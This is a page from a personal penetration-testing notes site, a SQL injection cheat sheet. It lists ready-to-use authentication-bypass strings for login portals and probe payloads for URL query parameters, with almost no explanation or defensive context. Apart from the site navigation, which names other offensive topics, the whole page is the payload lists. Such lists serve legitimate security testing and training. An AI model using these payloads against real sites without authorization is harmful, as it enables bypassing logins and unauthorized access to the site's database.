burmat / nathan burchfield
  • security and systems administration
  • security / hacking
    • Domain Enumeration + Exploitation
      • Command and Control
      • Credential Access
      • Defense Evasion
      • Discovery
      • Execution
      • Impact
      • Lateral Movement
      • Persistence
      • Privilege Escalation
    • Tools and Services
      • Adobe Experience Manager (AEM)
      • amass
      • ike-scan
      • jq
      • Shodan
      • smbmap
      • tmux
      • tshark
      • Voice Over IP (VoIP)
    • One-Liners and Dirty Scripts
    • MSFvenom Cheetsheet
    • Web Application Hacking
      • Cross-Site Scripting (XXS)
      • SQL Injection (SQLi)
    • OSCP / PWK - Random Tips and Tricks
  • systems administration
    • Active Directory Administration
    • Exchange Administration
    • System Fixes
    • Helper Commands
    • Log Parsing
    • SQL Server Administration
    • Windows Terminal Themes
Powered by GitBook
On this page
  • Quick-Hitters
  • Login Portals
  • URL Parameters
  1. security / hacking
  2. Web Application Hacking

SQL Injection (SQLi)

Quick-Hitters

Login Portals

admin' or '1'='1
" or ""="
' or 1=1 -- -
' union select 1,2,3 -- -
admin'-- -
' or "-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1 or "='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

URL Parameters

For https://site.com/?q=HERE

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
PreviousCross-Site Scripting (XXS)NextOSCP / PWK - Random Tips and Tricks

Last updated 7 months ago